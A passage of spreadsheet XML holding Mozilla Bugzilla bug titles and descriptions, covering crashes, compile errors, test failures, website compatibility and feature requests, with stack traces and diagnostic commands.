    <t>Don't pass uninitialized values to NSS CERT_PKIXVerifyCert  [@ CERT_DestroyCertificate - cert_pkixDestroyValOutParam]</t>
  </si>
  <si>
    <t>But 428038 is a bad crash and the correct fix will be to change NSS to be safe.
However as a quick fix it's sufficient to init a pointer variable to NULL in PSM.</t>
  </si>
  <si>
    <t>CORE-396186</t>
  </si>
  <si>
    <t>reverse async context menu events after bug 392652 is fixed</t>
  </si>
  <si>
    <t>Created attachment 280901
fix v1.0
After bug 392652 is fixed we won't need to send async context menu events from child widgets any more (bug 389542). Sending the cm events async was a necessary hack to work around popups closing asynchronously.</t>
  </si>
  <si>
    <t>CORE-397545</t>
  </si>
  <si>
    <t>jsDriver.pl claims e4x/Regress/regress-380833.js fails</t>
  </si>
  <si>
    <t>Created attachment 282303
test output
When I run the tests with jsDriver.pl this one fails:
  http://lxr.mozilla.org/mozilla/source/js/tests/e4x/Regress/regress-380833.js
But when I cat together the relevant shell.js files and run it manually the last line of output is:
  PASSED! Section 1 of test - Crash during GC after uneval
I think the test is actually passing and jsDriver.pl is incorrectly logging it as a failure maybe because the output (see attachment) contains the string FAILED.</t>
  </si>
  <si>
    <t>TOOLKIT_GRAVEYARD-489313</t>
  </si>
  <si>
    <t>Use toolkit/locales/l10n.mk for fx land on the 1.9.1 branch</t>
  </si>
  <si>
    <t>The l10n.mk that I used successfully on mozilla-central for fennec should be good to use for Firefox too.
We might want to land the status quo on the 1.9.1 branch before that though if Fennec decides to build off of 1.9.1 in the short term.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-166186</t>
  </si>
  <si>
    <t>coliposte.net - bad way of accessing forms via javascript</t>
  </si>
  <si>
    <t>coliposte.net is using forms and to submit those forms you have to click on an
image. the javascript they use for this doesnt work in mozilla (bad sniffing
bad way of accessing forms).
here is a fixed version of 2 functions involved : 
function doSubmitPro(){ 
  if(document.layers){
    document.layers[0].document.form1.submit()
  }  
  else if(document.form1){
    var f = document.form1
    f.submit()
  }  
}
function doSubmitPart(){
  if(document.layers){ 
    document.layers[0].document.form2.submit()
  }
  else if(document.form2){
    var f2 = document.form2
    f2.submit()
  }
}</t>
  </si>
  <si>
    <t>TOOLKIT-525672</t>
  </si>
  <si>
    <t>Removing a registry installed extensions causes itemLocation is null</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4
Build Identifier: Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4
Not a Specific and detailed bug report. No Send Feedback (grayed out) at Leave quick feedback.
FF 3.5.4 (for Mac) doesn't rid itself of the post-Add-on updates Restart Firefox to complete your changes even after several restarts. And the newly updated Add-ons are still grayed out.
Reproducible: Always
Steps to Reproduce:
1.Find Updates
2.Restart Firefox
2.Tools-&gt;Add-ons-&gt;Restart Firefox STILL THERE
2.
3.
Actual Results:  
Restart Firefox STILL THERE newly updated Add-ons GRAYED OUT.
Expected Results:  
I expected to
a) see different text in yellow strip (e.g. updates completed)
b) have the updated Add-ons enabled
c) close the Add-ons box
?</t>
  </si>
  <si>
    <t>marikavs</t>
  </si>
  <si>
    <t>PENELOPE_GRAVEYARD-381798</t>
  </si>
  <si>
    <t>need Viewing options to control when messages viewed in preview pane are marked as read</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
Build Identifier: Alpha 19
in eudora there are Viewing options to control when messages viewed in the preview pane are marked read.  these are incredible useful and are missing from Alpha 19.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>CORE-190167</t>
  </si>
  <si>
    <t>Cookie details empty</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.3b) Gecko/20030122
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.3b) Gecko/20030122
Detailed cookie informations are empty in the current nightly build
Reproducible: Always
Steps to Reproduce:
1.Go to a cookie site pref set to 'ask before storing a cookie'
2.click on 'Show details'
3.fields are empty
Actual Results:  
No cookie information
Expected Results:  
Detailed cookie information should be shown
COuld reproduce it with a clean profile</t>
  </si>
  <si>
    <t>buecherl</t>
  </si>
  <si>
    <t>CORE-94943</t>
  </si>
  <si>
    <t xml:space="preserve">[Buttons] Support implicit hookup of  and </t>
  </si>
  <si>
    <t>Support the ability to implicitly hook up both menupopups and tooltips.
I will have to get  up off the ground first and replace all
occurrences of popup[class=tooltip] with tooltip.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-237297</t>
  </si>
  <si>
    <t>cdiscount.fr - Javascript failled to load however work with IE</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.6) Gecko/20040206 Firefox/0.8
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.6) Gecko/20040206 Firefox/0.8
skip intro On main page click on DVD in the main menu bar try to find DVD with
search field and click OK button. The java console give error frm_search is not
defined however with internet explorer this work perfectly.
Reproducible: Always
Steps to Reproduce:
1.skip intro
2.click on DVD button on main menu bar
3.try to find DVD with search field
4.javascript console give error frm_search is not defined
Actual Results:  
Error on JAVAscript
Expected Results:  
search DVD like internet explorer
on mozilla 1.5 bug is present too.</t>
  </si>
  <si>
    <t>blairfancy</t>
  </si>
  <si>
    <t>CORE-551254</t>
  </si>
  <si>
    <t>Investigate safety of STL containers from code compiled with exceptions off</t>
  </si>
  <si>
    <t>We've been assuming that we can't make direct use of the STL because it throws exceptions rather than returning error codes cjones has been implementing wrappers that e.g. make use of our infallible-malloc support.
However I observe that GCC's STL (which is what we get on OSX and Linux) can be relied on to call std::terminate rather than crashing in an unpredictable way when it wants to throw an exception but it's been called from code compiled with -fno-exceptions.  Thus if we are confident that all C++ implementations we care about have this behavior (i.e. we need to check MSVC++'s behavior with /EH-) and we are comfortable treating all STL exceptions as fatal we don't need the wrappers.
Based on a quick skim of C++98 I think these are the exceptions that STL containers and strings can throw:
 bad_alloc   -- malloc failure if we're ok with all STL container usage being
                abort-on-memory-exhaustion this is fine
 length_error
 overflow
 invalid_argument -- various conditions amounting to assertion failures e.g.
                     you cannot possibly allocate an object of size 2**68.
                     Should be safe to treat as always-fatal.
 out_of_range -- Checked container accessors throw this when the index is
                 out of range for the container.  Should be safe to treat as
                 always-fatal
so I'm comfortable with treating STL exceptions as fatal.  Thoughts?</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-394236</t>
  </si>
  <si>
    <t>fix a typo on fr/firefox/about/ page</t>
  </si>
  <si>
    <t>please tag this file for production typo fix :
Modified: /fr/firefox/about/index.html
Committed revision 6372.
Thanks</t>
  </si>
  <si>
    <t>CORE-251112</t>
  </si>
  <si>
    <t>mozilla 1.7 and 1.7.1 doesn't compiles under gcc 3.4.1</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 N Linux i686 rv:1.8a1) Gecko/20040601 Galeon/1.3.16
Build Identifier: Mozilla/5.0 (X11 N Linux i686 rv:1.8a1) Gecko/20040601 Galeon/1.3.16
After switch from gcc 3.3.3 to 3.4.1 I can't compile mozilla 1.7 and 1.7.1.
It fails on:
make[4]: Entering directory
`/home/users/kloczek/rpm/BUILD/mozilla/intl/uconv/native'
nsNativeUConvService.cpp
g++ -o nsNativeUConvService.o -c -DOSTYPE=\Linux2.2\ -DOSARCH=\Linux\
-I./../util -I../../../dist/include/xpcom -I../../../dist/include/string
-I../../../dist/include/uconv -I../../../dist/include/ucnative
-I../../../dist/include
-I/home/users/kloczek/rpm/BUILD/mozilla/dist/include/nspr        -fPIC  
-fno-rtti -fno-exceptions -Wall -Wconversion -Wpointer-arith -Wcast-align
-Woverloaded-virtual -Wsynth -Wno-ctor-dtor-privacy -Wno-non-virtual-dtor
-Wno-long-long -fshort-wchar -pthread -pipe  -DNDEBUG -DTRIMMED -O2 -march=i686
  -DMOZILLA_CLIENT -include ../../../mozilla-config.h
-Wp-MD.deps/nsNativeUConvService.pp nsNativeUConvService.cpp
nsNativeUConvService.cpp: In member function `nsresult
IConvAdaptor::ConvertInternal(void* PRInt32* PRInt32 void* PRInt32* PRInt32)':
nsNativeUConvService.cpp:316: error: ISO C++ forbids cast to non-reference type
used as lvalue
nsNativeUConvService.cpp:321: error: ISO C++ forbids cast to non-reference type
used as lvalue
nsNativeUConvService.cpp:336: warning: comparison between signed and unsigned
integer expressions
nsNativeUConvService.cpp:344: warning: comparison between signed and unsigned
integer expressions
make[4]: *** [nsNativeUConvService.o] Error 1
make[4]: Leaving directory `/home/users/kloczek/rpm/BUILD/mozilla/intl/uconv/native'
Reproducible: Always
Steps to Reproduce:
1. Source code was configured with:
        --disable-debug \
        --disable-cpp-exceptions \
        --disable-cpp-rtti \
        --disable-elf-dynstr-gc \
        --disable-freetype2 \
        --disable-installer \
        --disable-pedantic \
        --disable-static \
        --disable-strip-libs \
        --disable-tests \
        --disable-xprint \
        --disable-xterm-updates \
        --enable-crypto \
        --enable-default-toolkit=gtk2 \
        --enable-extensions=defaultirc \
        --enable-gnomeui \
        --enable-gnomevfs \
        --enable-ldap \
        --enable-mathml \
        --enable-native-uconv \
        --enable-nspr-autoconf \
        --enable-postscript \
        --enable-shared \
        --enable-svg \
        --enable-svg-renderer-cairo \
        --enable-view-source \
        --enable-xft \
        --enable-xinerama \
        --enable-xprint \
        --without-system-nspr \
        --with-pthreads \
        --with-system-jpeg \
        --with-system-mng \
        --with-system-png \
        --with-system-zlib \
        --with-x</t>
  </si>
  <si>
    <t>kloczek</t>
  </si>
  <si>
    <t>BUGZILLA-313131</t>
  </si>
  <si>
    <t>Remove the unused get_classification_id() routine</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-280312</t>
  </si>
  <si>
    <t>Submit button should disable until submit done</t>
  </si>
  <si>
    <t>According to 8.1.9 in the spec Upon activation this control must become
unavailable for further activations until the submit process concludes with
either an xforms-submit-done or xforms-submit-error event.
If you go to the URL in the URL field you'll see that we do not behave accordingly.</t>
  </si>
  <si>
    <t>SEAMONKEY-355802</t>
  </si>
  <si>
    <t>[Cocoa] Missing SeaMonkey Menu Entries</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.9a1) Gecko/20061006 SeaMonkey/1.5a
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.9a1) Gecko/20061006 SeaMonkey/1.5a
Since about Oct. 01 the SeaMonkey Menu does not contain several entries such as Hide SeaMonkey. The only way to hid SeaMonkey application is to click the yellow button on the upper left corner for each window. Pain on you know where.
Reproducible: Always
Steps to Reproduce:
1. Open the latest nightly build.
2. Look at the SeaMonkey menu.
3.
Actual Results:  
Only three entries: About SeaMonkey Preference and Quit. All others are missing.</t>
  </si>
  <si>
    <t>timd_huang</t>
  </si>
  <si>
    <t>CORE-13268</t>
  </si>
  <si>
    <t>free memory read in nsDll::IsLoaded()</t>
  </si>
  <si>
    <t>This was a build from September 4 1999.
This is in the odd position of having a dead component where it crashed while in
autoregistration.  The second run skipped that component and ends up here after
trying to load a converter stream (the dead component is ucvlatin).
****  Purify instrumented ./apprunner.pure (pid 11924)  ****
FMR: Free memory read:
  * This is occurring while in:
        nsDll::IsLoaded() [xcDll.h:91]
        nsNativeComponentLoader::GetFactory(const nsID&amp;const char*const
char*nsIFactory**) [nsNativeComponentLoader.cpp:116]
        nsFactoryEntry::GetFactory(nsIFactory**) [nsComponentManager.h:297]
        nsComponentManagerImpl::FindFactory(const nsID&amp;nsIFactory**)
[nsComponentManager.cpp:1027]
        nsComponentManagerImpl::CreateInstance(const nsID&amp;nsISupports*const
nsID&amp;void**) [nsComponentManager.cpp:1198]
        nsComponentManager::CreateInstance(const nsID&amp;nsISupports*const
nsID&amp;void**) [nsRepository.cpp:77]
        nsCharsetConverterManager::GetCharsetConverter(const
nsString*void**const nsID*const ConverterInfo*int)
[nsCharsetConverterManager.cpp:414]
        nsCharsetConverterManager::GetUnicodeDecoder(const
nsString*nsIUnicodeDecoder**) [nsCharsetConverterManager.cpp:455]
        nsScanner::SetDocumentCharset(const nsString&amp;nsCharsetSource)
[nsScanner.cpp:159]
        nsScanner::nsScanner(nsString&amp;intconst nsString&amp;nsCharsetSource)
[nsScanner.cpp:89]
        nsParser::Parse(nsIURI*nsIStreamObserver*intvoid*eParseMode)
[nsParser.cpp:673]
        RDFXMLDataSourceImpl::Refresh(int) [nsRDFXMLDataSource.cpp:921]
        nsChromeRegistry::InitRegistry() [nsChromeRegistry.cpp:613]
        nsChromeProtocolHandler::NewChannel(const
char*nsIURI*nsILoadGroup*nsIEventSinkGetter*nsIChannel**)
[nsChromeProtocolHandler.cpp:152]
        nsIOService::NewChannelFromURI(const
char*nsIURI*nsILoadGroup*nsIEventSinkGetter*nsIChannel**)
[nsIOService.cpp:229]
        NS_OpenURI(nsIChannel**nsIURI*nsILoadGroup*nsIEventSinkGetter*)
[nsNeckoUtil.cpp:63]
        nsDocumentBindInfo::Bind(nsIURI*nsIStreamListener*nsIInputStream*)
[nsDocLoader.cpp:1814]
        nsDocumentBindInfo::Bind(const
nsString&amp;nsIInputStream*nsIStreamListener*) [nsDocLoader.cpp:1739]
        nsDocLoaderImpl::LoadDocument(const nsString&amp;const
char*nsIContentViewerContainer*nsIInputStream*nsISupports*nsIStreamObserver*
unsigned intunsigned int) [nsDocLoader.cpp:726]
        nsWebShell::DoLoadURL(const nsString&amp;const
char*nsIInputStream*unsigned intunsigned int) [nsWebShell.cpp:2277]
        nsWebShell::LoadURL(const unsigned short*const
char*nsIInputStream*intunsigned intunsigned intnsISupports*)
[nsWebShell.cpp:2494]
        nsWebShell::LoadURL(const unsigned short*nsIInputStream*intunsigned
intunsigned intnsISupports*) [nsWebShell.cpp:2061]
nsWebShellWindow::Initialize(nsIWebShellWindow*nsIAppShell*nsIURI*intintnsI
StreamObserver*nsIXULWindowCallbacks*intintnsWidgetInitData&amp;)
[nsWebShellWindow.cpp:440]
nsAppShellService::JustCreateTopWindow(nsIWebShellWindow*nsIURI*intintunsign
ed intnsIXULWindowCallbacks*intintnsIWebShellWindow**)
[nsAppShellService.cpp:585]
        nsAppShellService::CreateHiddenWindow() [nsAppShellService.cpp:272]
        nsAppShellService::Initialize(nsICmdLineService*)
[nsAppShellService.cpp:252]
        main1(intchar**) [nsAppRunner.cpp:794]
        main           [nsAppRunner.cpp:859]
        _start         [crt1.o]
  * Reading 4 bytes from 0xaacb8 in the heap.
  * Address 0xaacb8 is 16 bytes into a freed  block at 0xaaca8 of 44 bytes.
  * This block was allocated from:
        malloc         [rtlib.o]
        __bUiLtIn_nEw  [libraptorgfx.so]
        __builtin_new  [rtlib.o]
        nsNativeComponentLoader::CreateDll(nsIFileSpec*const char*nsDll**)
[nsNativeComponentLoader.cpp:1004]
        nsNativeComponentLoader::AutoRegisterComponent(intnsIFileSpec*int*)
[nsNativeComponentLoader.cpp:632]
        nsNativeComponentLoader::RegisterComponentsInDir(intnsIFileSpec*)
[nsNativeComponentLoader.cpp:299]
        nsNativeComponentLoader::AutoRegisterComponents(intnsIFileSpec*)
[nsNativeComponentLoader.cpp:243]
nsComponentManagerImpl::AutoRegister(nsIComponentManager::RegistrationTimensIFi
leSpec*) [nsComponentManager.cpp:1821]
nsComponentManager::AutoRegister(nsIComponentManager::RegistrationTimensIFileSp
ec*) [nsRepository.cpp:197]
        NS_AutoregisterComponents() [nsSetupRegistry.cpp:89]
        NS_SetupRegistry_1 [nsSetupRegistry.cpp:109]
        main1(intchar**) [nsAppRunner.cpp:759]
        main           [nsAppRunner.cpp:859]
        _start         [crt1.o]
  * There have been 21 frees since this block was freed from:
        free           [rtlib.o]
        __bUiLtIn_dElEtE [libraptorgfx.so]
        __builtin_delete [rtlib.o]
        nsDll::~nsDll() [xcDll.cpp:178]
        nsNativeComponentLoader::GetFactory(const nsID&amp;const char*const
char*nsIFactory**) [nsNativeComponentLoader.cpp:177]
        nsFactoryEntry::GetFactory(nsIFactory**) [nsComponentManager.h:297]
        nsComponentManagerImpl::FindFactory(const nsID&amp;nsIFactory**)
[nsComponentManager.cpp:1027]
        nsComponentManagerImpl::CreateInstance(const nsID&amp;nsISupports*const
nsID&amp;void**) [nsComponentManager.cpp:1198]
        nsComponentManager::CreateInstance(const nsID&amp;nsISupports*const
nsID&amp;void**) [nsRepository.cpp:77]
        nsCharsetConverterManager::GetCharsetConverter(const
nsString*void**const nsID*const ConverterInfo*int)
[nsCharsetConverterManager.cpp:414]
        nsCharsetConverterManager::GetUnicodeDecoder(const
nsString*nsIUnicodeDecoder**) [nsCharsetConverterManager.cpp:455]
        NS_NewB2UConverter(nsIUnicodeDecoder**nsISupports*nsString*)
[nsUnicharInputStream.cpp:149]
NS_NewConverterStream(nsIUnicharInputStream**nsISupports*nsIInputStream*intn
sString*) [nsUnicharInputStream.cpp:305]
        nsPersistentProperties::Load(nsIInputStream*) [nsProperties.cpp:227]
        nsURLProperties::nsURLProperties(nsString&amp;) [nsURLProperties.cpp:72]
        nsCharsetAlias2::nsCharsetAlias2() [nsCharsetAliasImp.cpp:66]
        nsCharsetAliasFactory::CreateInstance(nsISupports*const nsID&amp;void**)
[nsCharsetAliasImp.cpp:168]
        nsComponentManagerImpl::CreateInstance(const nsID&amp;nsISupports*const
nsID&amp;void**) [nsComponentManager.cpp:1201]
        nsComponentManager::CreateInstance(const nsID&amp;nsISupports*const
nsID&amp;void**) [nsRepository.cpp:77]
        nsServiceManagerImpl::GetService(const nsID&amp;const
nsID&amp;nsISupports**nsIShutdownListener*) [nsServiceManager.cpp:237]
        nsServiceManager::GetService(const nsID&amp;const
nsID&amp;nsISupports**nsIShutdownListener*) [nsServiceManager.cpp:443]
        nsScanner::SetDocumentCharset(const nsString&amp;nsCharsetSource)
[nsScanner.cpp:128]
        nsScanner::nsScanner(nsString&amp;intconst nsString&amp;nsCharsetSource)
[nsScanner.cpp:89]
        nsParser::Parse(nsIURI*nsIStreamObserver*intvoid*eParseMode)
[nsParser.cpp:673]
        RDFXMLDataSourceImpl::Refresh(int) [nsRDFXMLDataSource.cpp:921]
        nsChromeRegistry::InitRegistry() [nsChromeRegistry.cpp:613]
        nsChromeProtocolHandler::NewChannel(const
char*nsIURI*nsILoadGroup*nsIEventSinkGetter*nsIChannel**)
[nsChromeProtocolHandler.cpp:152]
        nsIOService::NewChannelFromURI(const
char*nsIURI*nsILoadGroup*nsIEventSinkGetter*nsIChannel**)
[nsIOService.cpp:229]
        NS_OpenURI(nsIChannel**nsIURI*nsILoadGroup*nsIEventSinkGetter*)
[nsNeckoUtil.cpp:63]
        nsDocumentBindInfo::Bind(nsIURI*nsIStreamListener*nsIInputStream*)
[nsDocLoader.cpp:1814]</t>
  </si>
  <si>
    <t>WEBSITES-449912</t>
  </si>
  <si>
    <t>raccettura's robert.accettura.com having DNS problems</t>
  </si>
  <si>
    <t>Been getting this for weeks. E-mailed you on Sat 19 Jul 2008 02:52:12 -0500 regarding this but I did not receive any response.
ERROR:planet.runner:HttpLib2Error: Unable to find the server at /archives/category/mozilla/feed/atom via 2
ERROR:planet.runner:Error 500 while updating feed http://robert.accettura.com/archives/category/mozilla/feed/atom
[root@mradm02 bin]# curl -I http://robert.accettura.com/archives/category/mozilla/feed/atom
curl: (6) Couldn't resolve host 'robert.accettura.com'
[root@mradm02 bin]# host robert.accettura.comrobert.accettura.com mail is handled by 999 mx4.robert.accettura.com.
robert.accettura.com mail is handled by 1 mail.robert.accettura.com.
robert.accettura.com mail is handled by 2 smtp.robert.accettura.com.
robert.accettura.com mail is handled by 999 mx3.robert.accettura.com.
You have a DNS problem somewhere. I can resolve it from my home laptop:
reed@jarodplus:~$ host robert.accettura.com
robert.accettura.com has address 64.207.212.2
robert.accettura.com mail is handled by 999 mx3.robert.accettura.com.
robert.accettura.com mail is handled by 999 mx4.robert.accettura.com.
robert.accettura.com mail is handled by 1 mail.robert.accettura.com.
robert.accettura.com mail is handled by 2 smtp.robert.accettura.com.
Until fixed blog has been pulled from planet.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-158090</t>
  </si>
  <si>
    <t>Italian</t>
  </si>
  <si>
    <t>tiscali.it - Is not possible to login. When i put login and passwd  i return to the same page without error messages</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.1b) Gecko/20020717
BuildID:    2002071708
When i try to login after click on entra we see again the login
page without any error message. Even if i try with a random login and password
the result is the same. The problem is not present on the release 1.0. 
Reproducible: Always
Steps to Reproduce:
1. put a random  login 
2. put a random  password 
3. click on entra or type return
Actual Results:  The browser reload the login page with the fields empty
Expected Results:  Log to my webmail or error messages because i have put a
wrong login</t>
  </si>
  <si>
    <t>italian</t>
  </si>
  <si>
    <t>netfrancesco6</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-294192</t>
  </si>
  <si>
    <t>[nit] Having prefs without label and help info with group == hidden still spams the console</t>
  </si>
  <si>
    <t>When starting ChatZilla with the console open 4 warnings are given every time
you start it:
WARNING: !!! Preference without label: urls.list
WARNING: Preference without help text: urls.list
WARNING: !!! Preference without label: urls.display
WARNING: Preference without help text: urls.display
To fix those (and make a general fix) the pref manager should check whether
group == 'hidden' before making these warnings.
Patch coming up.</t>
  </si>
  <si>
    <t>CORE-374472</t>
  </si>
  <si>
    <t>remove nsIXULCommand.h</t>
  </si>
  <si>
    <t>mozilla/xpfe/appshell/src/nsIXULCommand.h
looks like it isn't used and could go</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-368468</t>
  </si>
  <si>
    <t>Remora requires gd extension</t>
  </si>
  <si>
    <t>Remora requires the PHP gd extension for preview image manipulation. Could this please be added to the staging and preview sites?
(Current AMO has used gd since v1)
Thanks!</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-420016</t>
  </si>
  <si>
    <t>[ta-LK] Firefox - Sri Lankan Tamil Localization</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12
Build Identifier: Mozilla Firefox 3.02b 
We did Firefox 2.x localization earlier and now we are working on Mozilla Firefox 3.x 
Product : Firefox 3.x
Language : Sri Lankan Tamil
Contact name : Kengatharaiyer Sarveswaran (Sarves)
E-Mail : sarves@cse.mrt.ac.lk
Web page : www.lakapps.lk
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>THUNDERBIRD-378412</t>
  </si>
  <si>
    <t>Adding a Gmail account that already was entered manually results in invisible duplicate</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 7.0 Windows NT 5.1 MathPlayer 2.0 .NET CLR 2.0.50727 .NET CLR 1.1.4322 .NET CLR 3.0.04506.30 InfoPath.2)
Build Identifier: version 2.0.0.0 (20070326)
Adding a Gmail account that already was entered manually results in invisible duplicate.
The account exists twice but you can only see one because it uses the same server address.
Reproducible: Didn't try
Steps to Reproduce:
1. Manually create pop account for gmail
2. Create gmail account for same user.
Actual Results:  
You have 2 email accounts but can only see one. All messages are downloaded twice.
Expected Results:  
Not allowed the creation of the account
You can use the config editor to change the server address so you can then delete it in the account manager.</t>
  </si>
  <si>
    <t>deathbob</t>
  </si>
  <si>
    <t>CORE-451788</t>
  </si>
  <si>
    <t>TM: Multiplying dividing modulo two integers promotes to double</t>
  </si>
  <si>
    <t>The minimal shell testcase in bug 451673 has this line:
  limit = i * 1
Here 'i' is an integer counter.  As far as I can tell the tracer treats 'i' as an integer and of course 1 is an integer but the product is promoted to double. It might be worth it to bounds-check and not promote if we won't overflow.</t>
  </si>
  <si>
    <t>CORE-525741</t>
  </si>
  <si>
    <t>two JAR tests fail if modification date of their files is on day daylight saving time (summer time) starts or ends and after time change</t>
  </si>
  <si>
    <t>Today on tinderbox we've started seeing these failures:
TEST-UNEXPECTED-FAIL | e:\builds\moz2_slave\mozilla-central-win32-debug-unittest-everythingelse\build\xpcshell\tests\test_zipwriter\unit\test_asyncadd.js | test failed (with xpcshell return code: 3) see following log:
TEST-UNEXPECTED-FAIL | e:/builds/moz2_slave/mozilla-central-win32-debug-unittest-everythingelse/build/xpcshell/tests/test_zipwriter/unit/test_asyncadd.js | 3600000 - See following stack:
TEST-UNEXPECTED-FAIL | e:\builds\moz2_slave\mozilla-central-win32-debug-unittest-everythingelse\build\xpcshell\tests\test_zipwriter\unit\test_sync.js | test failed (with xpcshell return code: 3) see following log:
TEST-UNEXPECTED-FAIL | e:/builds/moz2_slave/mozilla-central-win32-debug-unittest-everythingelse/build/xpcshell/tests/test_zipwriter/unit/test_sync.js | 3600000 - See following stack:
These failures occur when the timestamps of the files in $(OBJDIR)/_tests/xpcshell/test_zipwriter/unit/data/ are:
 * on the day that we ended summer time
 * sometime after the time change
In other words I can reproduce the failures if I change to the above directory and run:
touch -t200911010430.00 * */* */*/*
or:
touch -t200903080430.00 * */* */*/*
(These dates assume your system time zone is a US time zone that observes daylight saving time.  If you're in some other time zone you'll have to adjust appropriately.)
I'm guessing we didn't see these failures in the past because we weren't using packaged unit tests and none of the test boxes checked out a fresh tree on the problematic day.</t>
  </si>
  <si>
    <t>michal.novotny</t>
  </si>
  <si>
    <t>CORE-486349</t>
  </si>
  <si>
    <t>Segmentation fault [@ _int_free] recursive destructor consuming stack space? [@ nsPluginTag::Release]</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9.0.8) Gecko/2009032713 Fedora/3.0.8-1.fc10 Firefox/3.0.8
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9.0.8) Gecko/2009032713 Fedora/3.0.8-1.fc10 Firefox/3.0.8
/usr/lib/firefox-3.0.8/run-mozilla.sh: line 131:  3288 Segmentation fault      $prog ${1+$@}
on https://bugzilla.mozilla.org and others sites
Reproducible: Always
Steps to Reproduce:
1.Open https://bugzilla.mozilla.org/enter_bug.cgi?
2. Put run-mozilla.sh: line 131:  3288 Segmentation fault in Search windows
3. Firefox crashed
Actual Results:  
Firefox crashed
Expected Results:  
Normal work</t>
  </si>
  <si>
    <t>ceo</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-521343</t>
  </si>
  <si>
    <t>re-image qm-pleopard-try06</t>
  </si>
  <si>
    <t>Was used for some custom testing and needs a refresh.</t>
  </si>
  <si>
    <t>DEVTOOLS-681651</t>
  </si>
  <si>
    <t>Move Highlighter's TreePanel associated code to browser/devtools</t>
  </si>
  <si>
    <t>We should move treepanel-related code (for the highlighter) to browser/devtools.</t>
  </si>
  <si>
    <t>CORE-450079</t>
  </si>
  <si>
    <t>TM: shell tests - Assertion failure: prop_ at jsinterp.cpp:4179</t>
  </si>
  <si>
    <t>e4x/Expressions/11.1.1.js along with about 650 other tests fail with 
Assertion failure: prop_ at jsinterp.cpp:4179
when the shell is run with -j enabled.
tracemonkey 887fc4facdeb tip
This is mac. I can't test with Linux or Windows as the moment as builds fail.</t>
  </si>
  <si>
    <t>DEVELOPER.MOZILLA.ORG-467346</t>
  </si>
  <si>
    <t>Deki history view should have a link per-revision to view changes in that revision vs. previous revision</t>
  </si>
  <si>
    <t>The Deki history view currently has a link per-revision to let you view that specific revision but if you want to see a diff of what that revision changed you need to select the right radio buttons and click compare. MediaWiki has a last link per-revision that will bring up a diff of the selected revision against the previous revision. I find this extremely useful to quickly see what was changed in a revision.
Compare:
https://developer.mozilla.org/index.php?title=En/Mozilla_internal_string_guide&amp;action=history
http://en.wikipedia.org/w/index.php?title=Mozilla&amp;action=history</t>
  </si>
  <si>
    <t>SEAMONKEY-24921</t>
  </si>
  <si>
    <t>Add TestOutSinks to automated tests</t>
  </si>
  <si>
    <t>I'd like to see TestOutSinks added to the automated tests so we'll know when
someone breaks these.  McAfee says he has plans to make it easy to add tests
like this.</t>
  </si>
  <si>
    <t>CORE-224127</t>
  </si>
  <si>
    <t>warning: `int posix_locale_category[6]' defined but not used in nsLocaleService.cpp</t>
  </si>
  <si>
    <t>/Users/timeless/mozilla/intl/locale/src/nsLocaleService.cpp:
82: warning: `int posix_locale_category[6]' defined but not used</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-441572</t>
  </si>
  <si>
    <t>garburator: Inner classes are rewritten as if they were the outer class</t>
  </si>
  <si>
    <t>Testcase already committed: http://hg.mozilla.org/index.cgi/oink/rev/c9fc8a4228a9
An outer class is marked stack-only the inner class constructor is rewritten to initialize all the *outer* class members.
1) the inner class isn't stack-only
2) even if it were we should only initialize the inner-class members not the outer-class members</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-508594</t>
  </si>
  <si>
    <t>Cesium</t>
  </si>
  <si>
    <t>Page page detail page page</t>
  </si>
  <si>
    <t>Rewrite page detail page according to mockup.
http://people.mozilla.com/~chowse/drop/cesium/LoFid_Page.png</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-226904</t>
  </si>
  <si>
    <t>[patch] Keep on the same collection between bookmarks manager sessions</t>
  </si>
  <si>
    <t>When I go into the bookmarks manager select a collection open a bookmark then
manager bookmarks aggain it should stay on the selected collection. Currently
it jumps back to Menu Bookmarks.
Incidentally Safari stays on the one you selected -)</t>
  </si>
  <si>
    <t>sbwoodside</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-460825</t>
  </si>
  <si>
    <t>Scheduled Maintenance - Oct 21 2008</t>
